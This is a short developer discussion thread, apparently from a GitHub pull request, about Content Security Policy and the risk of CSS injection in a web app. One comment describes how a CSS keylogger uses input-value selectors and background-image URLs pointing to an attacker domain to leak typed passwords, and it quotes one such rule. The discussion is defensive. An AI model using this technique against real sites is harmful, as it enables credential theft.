I 217 clear right filter

[4xdk]

As per Issue 217 - https://github.com/PursuanceProject/pursuance/issues/217

[elimisteve]

@4xdk https://stackoverflow.com/a/718614

[elimisteve]

@4xdk See also https://stackoverflow.com/questions/30653698/csp-style-src-unsafe-inline-is-it-worth-it#31759553

[elimisteve]

I just watched https://m.youtube.com/watch?v=eb3suf4REyI , which provides some explicit examples of how CSS injections can lead to issues like data exfiltration from the page to another domain controlled by the attacker.

[elimisteve]

I need to better understand how this CSS keylogger works: https://no-csp-css-keylogger.badsite.io

[4xdk]

Looks like there's a whole bunch of css rules for the input values (value ending with aa, ab, ac, etc) which change the background image css rule to e.g. background-image: url("//keylogger.badsite.io/ab") initiating GET request and passing this data to be joined on the server.

Interesting thing about this is that it's not that reliable. Each request gets sent only once, so password such as "aaaa" sends info about "a" and "aa" being present, nothing about the latter 2 characters in it. Still, an issue of course.

[4xdk]

Gotcha, I meant to add padding on the field to avoid that but this sounds even better.